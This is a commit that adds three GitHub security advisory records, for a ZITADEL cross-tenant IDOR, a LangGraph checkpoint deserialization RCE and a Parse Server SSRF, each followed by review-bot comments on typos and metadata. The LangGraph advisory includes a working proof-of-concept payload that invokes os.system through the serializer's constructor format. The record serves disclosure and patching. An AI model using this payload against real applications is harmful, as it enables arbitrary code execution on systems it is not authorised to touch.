
Commit 6f1b17b

1 parent 8856624 commit 6f1b17b


3 files changed: +243 -0 lines changed

Lines changed: 85 additions & 0 deletions
@@ -0,0 +1,85 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-cpf4-pmr4-w6cx",
4+
"modified": "2025-11-05T19:52:01Z",
5+
"published": "2025-11-05T19:52:01Z",
6+
"aliases": [],
7+
"summary": "IDOR Vulnerabilities in ZITADEL's Organization API allows Cross-Tenant Data Tempering",
8+
"details": "### Summary\n\nZITADEL's Organization V2Beta API contains Insecure Direct Object Reference (IDOR) vulnerabilities that allow authenticated users with specific **administrator** roles within one organization to access and modify data belonging to **other** organizations.\n\n### Impact\n\nZITADEL's Organization V2Beta API, intended for managing ZITADEL organizations, contains multiple endpoints that fail to properly authorize authenticated users. An attacker with an administrator role for a specific organization could exploit this to bypass access controls and perform unauthorized actions on other organizations within the same ZITADEL instance.\n\nThis could allow an attacker to:\n\n- **Read** organization data, including the name, domains and metadata.\n- **Manipulate** (modify) the corresponding organization data.\n- **Delete** the corresponding data, up to and including the entire organization.\n\nNote that this vulnerability is limited to organization-level data (name, domains, metadata). **No other related data (such as users, projects, applications, etc.) is affected.**\n\n### Affected Versions\n\nSystems running one of the following versions are affected:\n- **v4.x**: `4.0.0-rc.1` through `4.6.2`\n\n### Patches\n\nThe vulnerability has been addressed in the latest release. The patch resolves the issue by correctly validating the caller's permission against the target organization.\n\n- v4.x: Upgrade to version [4.6.3](https://github.com/zitadel/zitadel/releases/tag/v4.6.3) or later.\n\n### Workarounds\n\nUpgrading to a patched version is the recommended solution.\n\nIf an immediate upgrade is not possible, mitigation can be achieved by disabling the affected Organization V2Beta API endpoints (e.g., /v2beta/organizations/...) at a reverse proxy or Web Application Firewall (WAF) level.\n\n### Questions\n\nIf you have any questions or comments about this advisory, please email us at [[email protected]](mailto:[email protected])",
9+
"severity": [
10+
{
11+
"type": "CVSS_V4",
12+
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
13+
}
14+
],
15+
"affected": [
16+
{
17+
"package": {
18+
"ecosystem": "Go",
19+
"name": "github.com/zitadel/zitadel"
20+
},
21+
"ranges": [
22+
{
23+
"type": "ECOSYSTEM",
24+
"events": [
25+
{
26+
"introduced": "4.0.0-rc.1"
27+
},
28+
{
29+
"fixed": "4.6.3"
30+
}
31+
]
32+
}
33+
],
34+
"database_specific": {
35+
"last_known_affected_version_range": "< 4.6.2"
36+
}
37+
},
38+
{
39+
"package": {
40+
"ecosystem": "Go",
41+
"name": "github.com/zitadel/zitadel"
42+
},
43+
"ranges": [
44+
{
45+
"type": "ECOSYSTEM",
46+
"events": [
47+
{
48+
"introduced": "1.80.0-v2.20.0.20250414095945-f365cee73242"
49+
},
50+
{
51+
"fixed": "1.80.0-v2.20.0.20251105083648-8dcfff97ed52"
52+
}
53+
]
54+
}
55+
]
56+
}
57+
],
58+
"references": [
59+
{
60+
"type": "WEB",
61+
"url": "https://github.com/zitadel/zitadel/security/advisories/GHSA-cpf4-pmr4-w6cx"
62+
},
63+
{
64+
"type": "WEB",
65+
"url": "https://github.com/zitadel/zitadel/commit/8dcfff97ed52a8b9fc77ecb1f972744f42cff3ed"
66+
},
67+
{
68+
"type": "PACKAGE",
69+
"url": "https://github.com/zitadel/zitadel"
70+
},
71+
{
72+
"type": "WEB",
73+
"url": "https://github.com/zitadel/zitadel/releases/tag/v4.6.3"
74+
}
75+
],
76+
"database_specific": {
77+
"cwe_ids": [
78+
"CWE-639"
79+
],
80+
"severity": "HIGH",
81+
"github_reviewed": true,
82+
"github_reviewed_at": "2025-11-05T19:52:01Z",
83+
"nvd_published_at": null
84+
}
85+
}
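Review bot: the `last_known_affected_version_range` of `"< 4.6.2"` in the first affected entry contradicts the details text, which lists `4.0.0-rc.1` through `4.6.2` as affected and `4.6.3` as the fix; since `4.6.2` itself is vulnerable the range should read `"<= 4.6.2"` (or the field can be dropped, because the `fixed` event already bounds the range). Also, the summary reads `Data Tempering` where `Data Tampering` is meant, and `Vulnerabilities ... allows` should be `allow`.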
Lines changed: 67 additions & 0 deletions
@@ -0,0 +1,67 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-wwqv-p2pp-99h5",
4+
"modified": "2025-11-05T19:52:50Z",
5+
"published": "2025-11-05T19:52:50Z",
6+
"aliases": [],
7+
"summary": "LangGraph Checkpoint affected by RCE in \"json\" mode of JsonPlusSerializer ",
8+
"details": "# Summary\n\nPrior to `langgraph-checkpoint` version `3.0` , LangGraph’s `JsonPlusSerializer` (used as the default serialization protocol for all checkpointing) contains a remote code execution (RCE) vulnerability when deserializing payloads saved in the `\"json\"` serialization mode.\n\nIf an attacker can cause your application to persist a payload serialized in this mode, they may be able to also send malicious content that executes arbitrary Python code during deserialization.\n\nUpgrading to version langgraph-checkpoint `3.0` patches this vulnerability by preventing deserialization of custom objects saved in this mode.\n\nIf you are deploying in `langgraph-api`, any version `0.5` or later is also free of this vulnerability. \n\n# Details\n\n**Affected file / component**\n\n[jsonplus.py](https://github.com/langchain-ai/langgraph/blob/c5744f583b11745cd406f3059903e17bbcdcc8ac/libs/checkpoint/langgraph/checkpoint/serde/jsonplus.py)\n\nBy default, the serializer attempts to use `\"msgpack\"` for serialization. However, prior to version `3.0` of the checkpointer library, if illegal Unicode surrogate values caused serialization to fail, it would fall back to using the `\"json\"` mode.\n\nWhen operating in this mode, the deserializer supports a constructor-style format (`lc == 2`, `type == \"constructor\"`) for custom objects to allow them to be reconstructed at load time. If an attacker is able to trigger this mode with a malicious payload, deserializing allow the attacker to execute arbitrary functions upon load.\n\n---\n\n# Who is affected\n\nThis issue affects all users of `langgraph-checkpoint` **versions earlier than 3.0** who:\n\n1. Allow untrusted or user-supplied data to be persisted into checkpoints, and\n2. 
Use the default serializer (or explicitly instantiate `JsonPlusSerializer`) that may fall back to `\"json\"` mode.\n\nIf your application only processes trusted data or does not allow untrusted checkpoint writes, the practical risk is reduced.\n\n# Proof of Concept (PoC)\n\n```python\nfrom langgraph.graph import StateGraph \nfrom typing import TypedDict\nfrom langgraph.checkpoint.sqlite import SqliteSaver\n\nclass State(TypedDict):\n foo: str\n attack: dict\n\ndef my_node(state: State):\n return {\"foo\": \"oops i fetched a surrogate \\ud800\"}\n\nwith SqliteSaver.from_conn_string(\"foo.db\") as saver:\n graph = (\n\t StateGraph(State).\n\t add_node(\"my_node\", my_node).\n\t add_edge(\"__start__\", \"my_node\").\n\t compile(checkpointer=saver)\n\t )\n \n\n attack = {\n \"lc\": 2,\n \"type\": \"constructor\",\n \"id\": [\"os\", \"system\"],\n \"kwargs\": {\"command\": \"echo pwnd you > /tmp/pwnd.txt\"},\n }\n malicious_payload = {\n \"attack\": attack,\n }\n\n thread_id = \"00000000-0000-0000-0000-000000000001\"\n config = {\"thread_id\": thread_id}\n # Malicious payload is saved in the first call\n graph.invoke(malicious_payload, config=config)\n\n # Malicious payload is deserialized and code is executed in the second call\n graph.invoke({\"foo\": \"hi there\"}, config=config)\n\n```\n\nRunning this PoC writes a file `/tmp/pwnd.txt` to disk, demonstrating code execution.\n\nInternally, this exploits the following code path:\n\n```python\nfrom langgraph.checkpoint.serde.jsonplus import JsonPlusSerializer\n\nserializer = JsonPlusSerializer() # Used within the checkpointer\n\nserialized = serializer.dumps_typed(malicious_payload)\nserializer.loads_typed(serialized) # Executes os.system(...)\n\n```\n\n---\n\n# Fixed Version\n\nThe vulnerability is fixed in **`langgraph-checkpoint==3.0.0`**\n\nRelease link: https://github.com/langchain-ai/langgraph/releases/tag/checkpoint%3D%3D3.0.0\n\n---\n\n# Fix Description\n\nThe fix introduces an **allow-list** for constructor 
deserialization, restricting permissible `\"id\"` paths to explicitly approved module/class combinations provided at serializer construction.\n\nAdditionally, saving payloads in `\"json\"` format has been deprecated to remove this unsafe fallback path.\n\n---\n\n# Mitigation\n\nUpgrade immediately to `langgraph-checkpoint==3.0.0`.\n\nThis version is fully compatible with `langgraph>=0.3` and does **not** require any import changes or code modifications.\n\nIn `langgraph-api`, updating to `0.5` or later will automatically require the patched version of the checkpointer library.",
9+
"severity": [
10+
{
11+
"type": "CVSS_V4",
12+
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:H/SI:H/SA:H"
13+
}
14+
],
15+
"affected": [
16+
{
17+
"package": {
18+
"ecosystem": "PyPI",
19+
"name": "langgraph-checkpoint"
20+
},
21+
"ranges": [
22+
{
23+
"type": "ECOSYSTEM",
24+
"events": [
25+
{
26+
"introduced": "0"
27+
},
28+
{
29+
"fixed": "3.0.0"
30+
}
31+
]
32+
}
33+
]
34+
}
35+
],
36+
"references": [
37+
{
38+
"type": "WEB",
39+
"url": "https://github.com/langchain-ai/langgraph/security/advisories/GHSA-wwqv-p2pp-99h5"
40+
},
41+
{
42+
"type": "WEB",
43+
"url": "https://github.com/langchain-ai/langgraph/commit/c5744f583b11745cd406f3059903e17bbcdcc8ac"
44+
},
45+
{
46+
"type": "PACKAGE",
47+
"url": "https://github.com/langchain-ai/langgraph"
48+
},
49+
{
50+
"type": "WEB",
51+
"url": "https://github.com/langchain-ai/langgraph/blob/c5744f583b11745cd406f3059903e17bbcdcc8ac/libs/checkpoint/langgraph/checkpoint/serde/jsonplus.py"
52+
},
53+
{
54+
"type": "WEB",
55+
"url": "https://github.com/langchain-ai/langgraph/releases/tag/checkpoint%3D%3D3.0.0"
56+
}
57+
],
58+
"database_specific": {
59+
"cwe_ids": [
60+
"CWE-502"
61+
],
62+
"severity": "HIGH",
63+
"github_reviewed": true,
64+
"github_reviewed_at": "2025-11-05T19:52:50Z",
65+
"nvd_published_at": null
66+
}
67+
}
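Review bot: the summary string carries a trailing space before the closing quote (`JsonPlusSerializer "`), which will show up in downstream listings; trim it. In the details, `deserializing allow the attacker to execute` should read `allows`, and the opening paragraph names the fix as version `3.0` while the Fixed Version section and the `fixed` event use `3.0.0`; using the full `3.0.0` throughout keeps the text consistent with the affected range.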
Lines changed: 91 additions & 0 deletions
@@ -0,0 +1,91 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-x4qj-2f4q-r4rx",
4+
"modified": "2025-11-05T19:52:27Z",
5+
"published": "2025-11-05T19:52:27Z",
6+
"aliases": [],
7+
"summary": "Parse Server Vulnerable to Server-Side Request Forgery (SSRF) in File Upload via URI Format",
8+
"details": "### Impact\n\nA Server-Side Request Forgery (SSRF) vulnerability in the file upload functionality when trying to upload a `Parse.File` with `uri` parameter allows to execute an arbitrary URI. The vulnerability stems from a file upload feature in which Parse Server retrieves the file data from a URI that is provided in the request. A request to the provided URI is executed, but the response is not stored in Parse Server's file storage as the server crashes upon receiving the response.\n\n### Patches\n\nThe feature has been implemented in Parse Server 4.2.0 but never worked and reliably crashes the server when trying to use it due to a bug in its implementation. Since the feature is not currently working, and due to its risky nature, it has been removed to address the vulnerability.\n\n### Workarounds\n\nNone.",
9+
"severity": [
10+
{
11+
"type": "CVSS_V3",
12+
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
13+
}
14+
],
15+
"affected": [
16+
{
17+
"package": {
18+
"ecosystem": "npm",
19+
"name": "parse-server"
20+
},
21+
"ranges": [
22+
{
23+
"type": "ECOSYSTEM",
24+
"events": [
25+
{
26+
"introduced": "4.2.0"
27+
},
28+
{
29+
"fixed": "7.5.4"
30+
}
31+
]
32+
}
33+
]
34+
},
35+
{
36+
"package": {
37+
"ecosystem": "npm",
38+
"name": "parse-server"
39+
},
40+
"ranges": [
41+
{
42+
"type": "ECOSYSTEM",
43+
"events": [
44+
{
45+
"introduced": "8.0.0"
46+
},
47+
{
48+
"fixed": "8.4.0-alpha.2"
49+
}
50+
]
51+
}
52+
],
53+
"database_specific": {
54+
"last_known_affected_version_range": "<= 8.4.0-alpha.1"
55+
}
56+
}
57+
],
58+
"references": [
59+
{
60+
"type": "WEB",
61+
"url": "https://github.com/parse-community/parse-server/security/advisories/GHSA-x4qj-2f4q-r4rx"
62+
},
63+
{
64+
"type": "WEB",
65+
"url": "https://github.com/parse-community/parse-server/pull/9903"
66+
},
67+
{
68+
"type": "WEB",
69+
"url": "https://github.com/parse-community/parse-server/pull/9904"
70+
},
71+
{
72+
"type": "WEB",
73+
"url": "https://github.com/parse-community/parse-server/commit/8bbe3efbcf4a3b66f4a8db9bfb18cd98c050db51"
74+
},
75+
{
76+
"type": "WEB",
77+
"url": "https://github.com/parse-community/parse-server/commit/97763863b72689a29ad7a311dfb590c3e3c50585"
78+
},
79+
{
80+
"type": "PACKAGE",
81+
"url": "https://github.com/parse-community/parse-server"
82+
}
83+
],
84+
"database_specific": {
85+
"cwe_ids": [],
86+
"severity": "HIGH",
87+
"github_reviewed": true,
88+
"github_reviewed_at": "2025-11-05T19:52:27Z",
89+
"nvd_published_at": null
90+
}
91+
}
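Review bot: `cwe_ids` is empty even though the summary and details classify the issue as Server-Side Request Forgery; CWE-918 (Server-Side Request Forgery) is the matching entry and should be added so this record is classified like the other two advisories in this commit. The CVSS v3.1 vector scores availability only (`C:N/I:N/A:H`), which matches the stated crash, but the details also say the request to the attacker-supplied URI is actually sent before the crash, so confirm that a confidentiality rating of none is intended for that outbound request. Minor wording: `allows to execute an arbitrary URI` reads better as `allows an arbitrary URI to be requested`.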
